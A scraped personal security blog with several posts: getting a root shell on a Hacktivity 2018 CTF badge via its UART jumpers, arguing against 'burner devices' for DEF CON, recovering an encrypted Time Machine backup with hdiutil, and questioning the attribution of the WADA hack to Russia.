<div class="separator" style="clear: both; text-align: justify;">
In this case, it is connected to COM3. So let's fire up our favorite putty.exe, select Serial, choose COM3, add speed 9600, and you are ready to go!</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdMMszWjTBPxPHME5dTTDn3MFZuOk7lAg56P8E15n2noP03WtXVhd6zb6o6BXWIbkN2TeV5ethewLOL8-qIWUUk5AMycxOxLfl06OAXSDf0ODeFtH1KRmhnGp5lFTu7g4D8iNmZsBFkzKG/s1600/Screen+Shot+2019-09-16+at+18.22.04.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="308" data-original-width="710" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdMMszWjTBPxPHME5dTTDn3MFZuOk7lAg56P8E15n2noP03WtXVhd6zb6o6BXWIbkN2TeV5ethewLOL8-qIWUUk5AMycxOxLfl06OAXSDf0ODeFtH1KRmhnGp5lFTu7g4D8iNmZsBFkzKG/s400/Screen+Shot+2019-09-16+at+18.22.04.png" width="400" /></a></div>
<br />
You might check the end of the macOS section in case you can't see anything. Timing is everything.<br />
<br />
<h2>
The CTF</h2>
<pre>Welcome to the Hacktivity 2018 badge challenge!
This challenge consists of several tasks with one or more levels of
difficulty. They are all connected in some way or another to HW RE
and there's no competition, the whole purpose is to learn things.
Note: we recommend turning on local echo in your terminal!
Also, feel free to ask for hints at the Hackcenter!
Choose your destiny below:
1. Visual HW debugging
2. Reverse engineering
3. RF hacking
4. Crypto protection
Enter the number of the challenge you're interested in and press [
</pre>
</div>
</div>
<div style="text-align: justify;">
Excellent, now you are ready to hack this! In case you are lost in controlling the screen command, go to <a href="https://linuxize.com/post/how-to-use-linux-screen/">https://linuxize.com/post/how-to-use-linux-screen/</a>.<br />
<br />
I will not spoil any fun in giving out the challenge solutions here. It is still your task to find solutions for these.<br />
<br />
But here is a catch. You can get a root shell on the device. And it is pretty straightforward. Just carefully remove the Omega shield from the badge. Now you see two jumpers; by default, these are connected together as UART1. As seen below.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3FszdUYyi2KMczJGDKORKryFNuIODRYo9AtcbAEluBRNEU83NcM1WPipEHPb7KYDNB1uROVBycEES4ueq3aofIiBH4iv6f1ldTBuh1CCmddcSPKUZ9JnjrbLciHbjSv-v03jAyDOgAky4/s1600/IMG_8641.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1200" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3FszdUYyi2KMczJGDKORKryFNuIODRYo9AtcbAEluBRNEU83NcM1WPipEHPb7KYDNB1uROVBycEES4ueq3aofIiBH4iv6f1ldTBuh1CCmddcSPKUZ9JnjrbLciHbjSv-v03jAyDOgAky4/s400/IMG_8641.JPG" width="300" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
But what happens if you move these jumpers to UART0? Guess what, you can get a root shell! This is what I call privilege escalation on the HW level :) But first, let's connect the Omega shield back. Also, for added fun, this new interface speaks on 115200 baud, so you should change your screen parameters to 115200. Also, the new interface has a different ID under /dev, but I am sure you can figure this out from now on.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="1600" data-original-width="1200" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizXtKiw6ccyN7Xnw9V_ahDfhF64mlH0APhFiNYHxggejIZXeRmb35SOO39hcJtGGJp3T3qfzuD8ZEK3AB6BGmiph8weH72JJSs8-qtRN2cGoTH59vSenoeTKrZtO37Oryavu_mdnnBUXdx/s400/IMG_8642.JPG" width="300" /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">If you connect to the device during boot time, you can see a lot of exciting debug information about the device. And after it boots, you just get a root prompt. Woohoo! </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">But what can you do with this root access? Well, for starters, how about running </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;"># strings hello | less</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">From now on, you are on your own to hack this badge. Happy hacking.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">Big thanks to <a href="https://twitter.com/0xmaro" target="_blank">Attila Marosi-Bauer</a> and <a href="https://hsbp.org/HomePage" target="_blank">Hackerspace Budapest</a> for developing this badge and the contests.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">PS: In case you want to use the radio functionality of the badge, see below how you should solder the parts to it. By default, you can process slow speed radio frequency signals on GPIO19. But for higher transfer speeds, you should wire the RF module DATA OUT pin with the RX1 free together.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQBl7onzM8MsVju5f2iAAUJosYyupKACrIF_PkPjeC7SDl5v83puy3xL8Vk36q8ETvsEmYOIoPpebEHrQtIOXRa_g1uCKq-wDYfb3nj9fRX8pafAc1aJAapSs6vZwLMD036-g4TiHCzHjp/s1600/IMG_8638.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1200" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQBl7onzM8MsVju5f2iAAUJosYyupKACrIF_PkPjeC7SDl5v83puy3xL8Vk36q8ETvsEmYOIoPpebEHrQtIOXRa_g1uCKq-wDYfb3nj9fRX8pafAc1aJAapSs6vZwLMD036-g4TiHCzHjp/s400/IMG_8638.JPG" width="300" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com3tag:blogger.com,1999:blog-7429675726481888518.post-31137326587971684052018-08-15T09:43:00.000+02:002019-10-08T15:31:11.294+02:00How to build a "burner device" for DEF CON in one easy step<div style="text-align: justify;">
TL;DR: Don't build a burner device. Probably this is not the risk you are looking for.</div>
<h3 style="text-align: justify;">
Introduction</h3>
<div style="text-align: justify;">
Every year before DEF CON people starts to give <a href="https://blog.erratasec.com/2017/07/burner-laptops-for-def-con.html" target="_blank">advice</a> to attendees to bring "burner devices" to DEF CON. Some people also start to create <a href="https://github.com/CrowdStrike/travel-laptop" target="_blank">long lists</a> on how to build burner devices, especially laptops. But the deeper we look into the topic, the more confusing it gets. Why are we doing this? Why are we recommending this? Are we focusing on the right things?</div>
<h3 style="text-align: justify;">
What is a "burner device" used for?</h3>
<div style="text-align: justify;">
For starters, the whole "burner device" concept is totally misunderstood, even within the ITSEC community. A "burner device" is used for non-attribution. You know, for example, you are a spy and you don't want the country where you live to know that you are communicating with someone else. I believe this is not the situation for most attendees at DEF CON. More info about the meaning of "burner" <a href="https://twitter.com/Viss/status/877400669669306369" target="_blank">https://twitter.com/Viss/status/877400669669306369</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burner phone means it has a throwaway SIM card with a throwaway phone, used for one specific operation only. <b>You don't use the "burner device" to log in to your e-mail account or to VPN to your work or home.</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8pOq2W4O_ltFgCWIN7PlX43bMTr62Rgzu_n0gZAu2RHPElrFw1CmD2nJCOZGG0KHUT6gEkfNEZ72bpeZnfR1_ADJIohYtSz3BuCDviO_6_p4hIYOtI6c7L8kUY9YhsvawXWAXvfNG5s7H/s1600/%2524_86.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="768" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8pOq2W4O_ltFgCWIN7PlX43bMTr62Rgzu_n0gZAu2RHPElrFw1CmD2nJCOZGG0KHUT6gEkfNEZ72bpeZnfR1_ADJIohYtSz3BuCDviO_6_p4hIYOtI6c7L8kUY9YhsvawXWAXvfNG5s7H/s400/%2524_86.JPG" width="300" /></a></div>
<div style="text-align: justify;">
But let's forget this word misuse issue for a moment, and focus on the real problem.</div>
<h3 style="text-align: justify;">
The bad advice</h3>
<div style="text-align: justify;">
The Internet is full of articles focusing on the wrong things, especially when it comes to "burner devices". Like how to build a burner laptop, without explaining why you need it or how to use it.</div>
<div style="text-align: justify;">
The problem with this approach is that people end up "burning" (lame wordplay, sorry) significant resources for building a secure "burner device". But people are not educated about how they should use these devices.</div>
<h3 style="text-align: justify;">
The threats</h3>
<div style="text-align: justify;">
I believe the followings are some real threats which are higher when you travel:</div>
<div style="text-align: justify;">
1. The laptop getting lost or stolen.</div>
<div style="text-align: justify;">
2. The laptop getting inspected/copied at the border.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
These two risks have nothing to do with DEF CON, this is true for every travel.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Some other risks which are usually mentioned when it comes to "burner devices" and DEF CON:</div>
<div style="text-align: justify;">
3. Device getting owned via physical access while in a hotel room.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZQcPz-OvCdqMjq7Atj5jCghi7rjOKc119BN-WX8eAhHL60f9Mu7fMWvOoeMeVZ-3TxtxIRK_py_zFrqtsZyymdy_AcX_Hnl69HclIXvpOqnYy0g4ByM0HAhwrn6_xMjakKXf15MEXyzMo/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="616" height="531" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZQcPz-OvCdqMjq7Atj5jCghi7rjOKc119BN-WX8eAhHL60f9Mu7fMWvOoeMeVZ-3TxtxIRK_py_zFrqtsZyymdy_AcX_Hnl69HclIXvpOqnYy0g4ByM0HAhwrn6_xMjakKXf15MEXyzMo/s640/Capture.PNG" width="640" /></a></div>
<div style="text-align: justify;">
4. Network traffic Man-in-the-middle attacked. Your password displayed on a Wall of Sheep. Or having fun with <a href="https://twitter.com/parkerschmitt/status/515415443528351744" target="_blank">Shellshock </a>with DHCP. Information leak of NTLM hashes or similar.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvepSHD0DxwOdsHvwOsrpAHfqG_jhZC1F9n7DitSm8FCAoicczZsQQ25b1i5_6ehi7jH9I_hk8fZygrn1c4L8ZghFnZRvGBXSs4SUdT3J34IhyphenhyphenBaet4HBxQpHKWM_qGjEA12MCyHrddcON/s1600/Capture2.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="598" data-original-width="679" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvepSHD0DxwOdsHvwOsrpAHfqG_jhZC1F9n7DitSm8FCAoicczZsQQ25b1i5_6ehi7jH9I_hk8fZygrn1c4L8ZghFnZRvGBXSs4SUdT3J34IhyphenhyphenBaet4HBxQpHKWM_qGjEA12MCyHrddcON/s400/Capture2.PNG" width="400" /></a></div>
<div style="text-align: justify;">
5. Pwning the device via some nasty things like WiFi/TCP/Bluetooth/LTE/3G/GSM stack. These are unicorn attacks.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh13ePLgISlZ5lt1uMEnU4lHogyaQ-O9x-tV8XEGgsQo-JG9W5xQGavFAwoYKWH8HF1bUISMVkL7hyoNqHFah6fj5HCtuPbdymJ2ftPfhlht1bXEbWS9JUvBm4JimVrSlHRLkMn0Ltfn99j/s1600/b95.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1377" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh13ePLgISlZ5lt1uMEnU4lHogyaQ-O9x-tV8XEGgsQo-JG9W5xQGavFAwoYKWH8HF1bUISMVkL7hyoNqHFah6fj5HCtuPbdymJ2ftPfhlht1bXEbWS9JUvBm4JimVrSlHRLkMn0Ltfn99j/s320/b95.png" width="275" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
6. Pwning your device by pwning a service on your device. Like leaving your upload.php file in the root folder you use at CTFs and Nginx is set to autostart. The author of this article cannot comment on this incident whether it happened in real life or is just an imaginary example. </div>
<h3 style="text-align: justify;">
How to mitigate these risks? </h3>
<div style="text-align: justify;">
Laptop getting stolen/lost/inspected at the border?</div>
<div style="text-align: justify;">
1. Bring a cheap, empty device with you. Or set up a fake OS/fake account to log in if you really need your day-to-day laptop. This dummy account should not decrypt the real files in the real account.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMmGAmD3f_JKhXKtdhBD70APpCce3vaYdB5M6Qz5g_HyLJ88DCHIC0YTRvBvb2LvawCW91htiCHvdlmyWcIwDp0LDIGq7RxywNbJX6tjbh8xxB9PXdL4JMy051yMAFW1PCW71s0OVxwgKY/s1600/c05916387.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="430" data-original-width="573" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMmGAmD3f_JKhXKtdhBD70APpCce3vaYdB5M6Qz5g_HyLJ88DCHIC0YTRvBvb2LvawCW91htiCHvdlmyWcIwDp0LDIGq7RxywNbJX6tjbh8xxB9PXdL4JMy051yMAFW1PCW71s0OVxwgKY/s640/c05916387.png" width="640" /></a></div>
<h4 style="text-align: justify;">
Device getting owned while in a hotel room with physical access</h4>
<div style="text-align: justify;">
1. Don't bring any device with you.</div>
<div style="text-align: justify;">
2. If you bring any, make it tamper-resistant. How to do that depends on your enemy, but you can start by using nail glitter and Full Disk Encryption. Tools like Do Not Disturb help. It also helps if your OS supports suspending DMA devices before the user logs in.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3SyrVswphXIRO6OLgkPKiZqNKREYytSxP6eQz3jbdz4LDpRdMOTaRriZtJhyphenhyphenPScMNV2QQMA4PEf_L3wda5fNOvVR_34mBdYRXxbDwYNJENKSIUp6MNW2Lh4uEsftFIESQELzrB06wKro/s1600/tamper_4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="688" data-original-width="1020" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3SyrVswphXIRO6OLgkPKiZqNKREYytSxP6eQz3jbdz4LDpRdMOTaRriZtJhyphenhyphenPScMNV2QQMA4PEf_L3wda5fNOvVR_34mBdYRXxbDwYNJENKSIUp6MNW2Lh4uEsftFIESQELzrB06wKro/s400/tamper_4.png" width="400" /></a></div>
<div style="text-align: justify;">
3. If you can't make the device tamper-resistant, use a device that has a good defense against physical attackers, like iOS.</div>
<div style="text-align: justify;">
4. Probably you are not that important anyway that anyone will spend time and resources on you. If they do, probably you will only make your life miserable with all the hardening, but still, get pwned.</div>
<h4 style="text-align: justify;">
Network traffic Man-in-the-middle attacked</h4>
<div style="text-align: justify;">
1. Don't bring any device with you.</div>
<div style="text-align: justify;">
2. Use services that are protected against MiTM. Like TLS.</div>
<div style="text-align: justify;">
3. Update your OS to the latest and greatest versions. Not everyone at DEF CON has a 0dayz worth of 100K USD, and even the ones who have won't waste it on you. </div>
<div style="text-align: justify;">
4. Use fail-safe VPN. Unfortunately, not many people talk about this or have proper solutions for the most popular operating systems.</div>
<div style="text-align: justify;">
5. For specific attacks like Responder, disable<a href="http://www.pciqsatalk.com/2016/03/disable-lmnr-netbios.html" target="_blank"> LLMNR, NBT-NS</a>, <a href="https://stackoverflow.com/a/41048991" target="_blank">WPAD, </a>and <a href="https://medium.com/@JockDaRock/disabling-ipv6-on-network-adapter-windows-10-5fad010bca75" target="_blank">IPv6 </a>and use a non-work account on the machine. If you don't have the privileges to do so on your machine, you probably should not bring this device with you. Or ask your local IT to disable these services and set up a new account for you.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitjFexAJVLfK35fH2_rqK6adYbxv7P_WSfNwryvTOkopDtIiTQU81lk7MFSrLxeiR7hlDI6bLld0mh6Bt4ePBgzvmM1QAWDniFsw6m_Fz_Th3AmHy9j0ym0DyxlBv0vBbp2ElAkPYpfetu/s1600/win10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="714" data-original-width="1366" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitjFexAJVLfK35fH2_rqK6adYbxv7P_WSfNwryvTOkopDtIiTQU81lk7MFSrLxeiR7hlDI6bLld0mh6Bt4ePBgzvmM1QAWDniFsw6m_Fz_Th3AmHy9j0ym0DyxlBv0vBbp2ElAkPYpfetu/s640/win10.png" width="640" /></a></div>
<h4 style="text-align: justify;">
Pwning the device via some nasty thing like WiFi/TCP/Bluetooth/LTE/3G/GSM stack</h4>
<div style="text-align: justify;">
1. Don't bring any device with you.</div>
<div style="text-align: justify;">
2. If you bring any, do not use this device to log in to work, personal email, social media, etc.</div>
<div style="text-align: justify;">
3. Don't worry, these things don't happen very often. </div>
<h4 style="text-align: justify;">
Pwning your device by pwning a service on your device</h4>
<div style="text-align: justify;">
Just set up a firewall profile where all services are hidden from the outside. You rarely need any service accessible on your device at a hacker conference.</div>
<h3 style="text-align: justify;">
Conclusion</h3>
<div style="text-align: justify;">
If you are still so afraid to go there, just don't go there. Watch the talks at home. But how is the hotel WiFi at a random place different from a hacker conference? <a href="https://securelist.com/the-darkhotel-apt/66779/" target="_blank">Turns out, it is not much different</a>, so you better spend time and resources on hardening your daily work devices for 365 days, instead of building a "burner device".</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You probably need a "burner device" if you are a spy for a foreign government. Or you are the head of a criminal organization. Otherwise, you don't need a burner device. Maybe you need to bring a cheap replacement device.</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-34281069872321709922018-07-21T15:42:00.002+02:002019-10-08T15:32:30.047+02:00Recovering data from an old encrypted Time Machine backupRecovering data from a backup should be an easy thing to do. At least this is what you expect. Yesterday I had a problem which should have been easy to solve, but it was not. I hope this blog post can help others who face the same problem.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0JkKFYnSZ_eyyobIyl4hXMQilc5mr3shmwBGAs835DJES2EXonyWiOfqf35G9bjCK1rO93sWkPfLkReQFtVDK2ILHQBRdBzFDuiEAXvY5LQZ8AzfHAK0hQGdu8Bp_cfvIxiJCrz5neDZb/s1600/macos-high-sierra-system-preferences-time-machine.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="881" data-original-width="1336" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0JkKFYnSZ_eyyobIyl4hXMQilc5mr3shmwBGAs835DJES2EXonyWiOfqf35G9bjCK1rO93sWkPfLkReQFtVDK2ILHQBRdBzFDuiEAXvY5LQZ8AzfHAK0hQGdu8Bp_cfvIxiJCrz5neDZb/s400/macos-high-sierra-system-preferences-time-machine.jpg" width="400" /></a></div>
<br />
<h2>
The problem</h2>
1. I had an encrypted Time Machine backup which was not used for months<br />
2. This backup was not on an official Apple Time Capsule or on a USB HDD, but on a WD MyCloud NAS<br />
3. I needed files from this backup<br />
4. After running out of time I only had SSH access to the macOS, no GUI<br />
<br />
<h2>
The struggle</h2>
By default, Time Machine is one of the best and easiest backup solution I have seen. As long as you stick to the default use case, where you have one active backup disk, life is pink and happy. But this was not my case.<br />
<br />
As always, I started to Google what shall I do. One of the first options recommended that I add the backup disk to Time Machine, and it will automagically show the backup snapshots from the old backup. Instead of this, it did not show the old snapshots but started to create a new backup. Panic button has been pressed, backup canceled, back to Google.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp_OV1TVoxehJnx2rzK7azkDdFqm5KrDKYqYq69RMMPajvAlfKm2zW1yh5NL2YXIlD2ulfeoxghyphenhyphena-RWne3f_ryBuxrVetSAk8ijEOyEDkMfXUN21nrTasLVgJ4pGGFUn8mmuCGSFA4rVU/s1600/use-additional-backup-drive-time-machine.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="321" data-original-width="516" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp_OV1TVoxehJnx2rzK7azkDdFqm5KrDKYqYq69RMMPajvAlfKm2zW1yh5NL2YXIlD2ulfeoxghyphenhyphena-RWne3f_ryBuxrVetSAk8ijEOyEDkMfXUN21nrTasLVgJ4pGGFUn8mmuCGSFA4rVU/s320/use-additional-backup-drive-time-machine.jpeg" width="320" /></a></div>
<br />
<br />
Other tutorials recommend to click on the Time Machine icon and pressing alt (Option) key, where I can choose "Browse other backup disks". But this did not list the old Time Machine backup. It did list the backup when selecting disks in Time Machine preferences, but I already tried and failed that way.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinbdgjhgLXYK3zIFUKqmXDgfsOjymkHYrlsuX6AizHffsVvkj9tthL-bV8fQnkqkc9Tzv8Hu7QGzdtM5_chUbvQ0bXjn-biUqJuWvvW5_b5fuGctjxzWvXkA7nUX2KGuC5TB5cIpBvw1xD/s1600/browse-additional-backup-disks.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="191" data-original-width="437" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinbdgjhgLXYK3zIFUKqmXDgfsOjymkHYrlsuX6AizHffsVvkj9tthL-bV8fQnkqkc9Tzv8Hu7QGzdtM5_chUbvQ0bXjn-biUqJuWvvW5_b5fuGctjxzWvXkA7nUX2KGuC5TB5cIpBvw1xD/s320/browse-additional-backup-disks.jpeg" width="320" /></a></div>
<br />
<br />
YAT (yet another tutorial) recommended to SSH into the NAS, and browse the backup disk, as it is just a simple directory where I can see all the files. But all the files inside where just a bunch of nonsense, no real directory structure.<br />
<br />
YAT (yet another tutorial) recommended that I can just easily browse the content of the backup from the Finder by double-clicking on the sparse bundle file. After clicking on it, I can see the disk image on the left part of the Finder, attached as a new disk.<br />
Well, this is true, but because of some bug, when you connect to the Time Capsule, you don't see the sparse bundle file. And I got inconsistent results, for the WD NAS, double-clicking on the sparse bundle did nothing. For the Time Capsule, it did work.<br />
At this point, I had to leave the location where the backup was present, and I only had remote SSH access. You know, if you can't solve a problem, let's complicate things by restrict yourself in solutions.<br />
<span style="color: red;"><br /></span>
Finally, I tried to check out some data forensics blogs, and besides some expensive tools, I could find the solution.<br />
<h2>
The solution</h2>
Finally, a <a href="https://d4rkw1ll0w4n6.wordpress.com/2015/02/12/timemachine-4n6/" target="_blank">blog post</a> provided the real solution - hdiutil.<br />
The best part of hdiutil is that you can provide the read-only flag to it. This can be very awesome when it comes to forensics acquisition.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbVdgQe67dIzAGnBk63Z1Lt0uKLZHmm537-Vwt6c9jMrmQ8u18bByT5vUVFsvdnivqr_UvMjcmccjEPg-sxp81V51WpXd-nZZ6fdtrzazmSaKtMcc7zgASerCA_z84FXcc3iibf-bBzYiV/s1600/Screen+Shot+2018-07-19+at+09.54.50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="389" data-original-width="1596" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbVdgQe67dIzAGnBk63Z1Lt0uKLZHmm537-Vwt6c9jMrmQ8u18bByT5vUVFsvdnivqr_UvMjcmccjEPg-sxp81V51WpXd-nZZ6fdtrzazmSaKtMcc7zgASerCA_z84FXcc3iibf-bBzYiV/s400/Screen+Shot+2018-07-19+at+09.54.50.png" width="400" /></a></div>
<br />
To mount any NAS via SMB:<br />
<pre class="prettyprint lang-bsh">mount_smbfs afp://<username>@<NAS_IP>/<Share_for_backup> /<mountpoint></pre>
<br />
To mount a Time Capsule share via AFP:<br />
<pre class="prettyprint lang-bsh">mount_afp afp://any_username:password@<Time_Capsule_IP>/<Share_for_backup> /<mountpoint></pre>
<br />
And finally this command should do the job:<br />
<pre class="prettyprint lang-bsh">hdiutil attach test.sparsebundle -readonly</pre>
<br />
It is nice that you can provide read-only parameter.<br />
<br />
If the backup was encrypted and you don't want to provide the password in a password prompt, use the following:<br />
<pre class="prettyprint lang-bsh">printf '%s' 'CorrectHorseBatteryStaple' | hdiutil attach test.sparsebundle -stdinpass -readonly</pre>
<br />
Note: if you receive the error "resource temporarily unavailable", probably another machine is backing up to the device<br />
<br />
And now, you can find your backup disk under /Volumes. Happy restoring!<br />
<br />
Probably it would have been quicker to either enable the remote GUI, or to physically travel to the system and login locally, but that would spoil the fun.Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-64745164514873440642016-10-17T10:41:00.002+02:002019-10-08T15:35:24.222+02:00Why (I believe) WADA was not hacked by the RussiansDisclaimer: This is my personal opinion. I am not an expert in attribution. But as it turns out, not many people in the world are good at attribution. I know this post lacks real evidence and is mostly based on speculation.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG99n-H_FvV8To_0cNCrlF63bvnu2V8T5k4h5oZmxt8Ac9K8q7_tXZr6K2ElKfcaMWZMX-HsgtRhZ6LJK3B0cg4GOnmjESUP-GgGFK_99XsIX0Ez0F0d7W2888Y6P5PxWV_FSegt5m0Rcf/s1600/wada.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG99n-H_FvV8To_0cNCrlF63bvnu2V8T5k4h5oZmxt8Ac9K8q7_tXZr6K2ElKfcaMWZMX-HsgtRhZ6LJK3B0cg4GOnmjESUP-GgGFK_99XsIX0Ez0F0d7W2888Y6P5PxWV_FSegt5m0Rcf/s320/wada.png" width="320" /></a></div>
<br />
<br />
Let's start with the main facts we know about the WADA hack, in chronological order:<br />
<br />
<br />
1. Some point in time (August - September 2016), the WADA database has been hacked and exfiltrated<br />
<div>
2. August 15th, "WADA has alerted their stakeholders that email phishing scams are being reported in connection with WADA and therefore asks its recipients to be careful" <a href="https://m.paralympic.org/news/wada-warns-stakeholders-phishing-scams">https://m.paralympic.org/news/wada-warns-stakeholders-phishing-scams</a><br />
3. September 1st, the fancybear.net domain has been registered<br />
<div>
<pre style="font-family: "Courier New", monospace; font-size: 13px;"> Domain Name: FANCYBEAR.NET
...
Updated Date: 18-sep-2016
Creation Date: 01-sep-2016</pre>
<pre style="font-family: "Courier New", monospace; font-size: 13px;"></pre>
</div>
4. The content of the WADA hack has been published on the website<br />
5. The @FancyBears and @FancyBearsHT Twitter accounts have been created and started to tweet on 12th September, reaching out to journalists<br />
6. 12th September, Western media started headlines "Russia hacked WADA"</div>
<div>
7. The leaked documents have been altered, states WADA <a href="https://www.wada-ama.org/en/media/news/2016-10/cyber-security-update-wadas-incident-response">https://www.wada-ama.org/en/media/news/2016-10/cyber-security-update-wadas-incident-response</a><br />
<br />
<br />
<h3>
The Threatconnect analysis</h3>
The only technical analysis on why Russia was behind the hack, can be read here: <a href="https://www.threatconnect.com/blog/fancy-bear-anti-doping-agency-phishing/">https://www.threatconnect.com/blog/fancy-bear-anti-doping-agency-phishing/</a><br />
<br />
After reading this, I was able to collect the following main points:<br />
<br />
<ol>
<li>It is Russia because Russian APT groups are capable of phishing</li>
<li>It is Russia because the phishing site "wada-awa[.]org was registered and uses a name server from ITitch[.]com, a domain registrar that FANCY BEAR actors recently used"</li>
<li>It is Russia because "Wada-arna[.]org and tas-cass[.]org were registered through and use name servers from Domains4bitcoins[.]com, a registrar that has also been associated with FANCY BEAR activity."</li>
<li>It is Russia, because "The registration of these domains on August 3rd and 8th, 2016 are consistent with the timeline in which the WADA recommended banning all Russian athletes from the Olympic and Paralympic games."</li>
<li>It is Russia, because "The use of 1&1 mail.com webmail addresses to register domains matches a TTP we previously identified for FANCY BEAR actors."</li>
</ol>
<br />
There is an interesting side-track in the article, the case of the @anpoland account. Let me deal with this at the end of this post.<br />
<br />
My problem with the above points is that all five flag was publicly accessible to anyone as TTP's for Fancy Bear. And meanwhile, all five is weak evidence. Any script kittie in the world is capable of both hacking WADA and planting these false-flags.<br />
<br />
A stronger than these weak pieces of evidence would be:<br />
<br />
<ul>
<li>Malware sharing same code attributed to Fancy Bear (where the code is not publicly available or circulating on hackforums)</li>
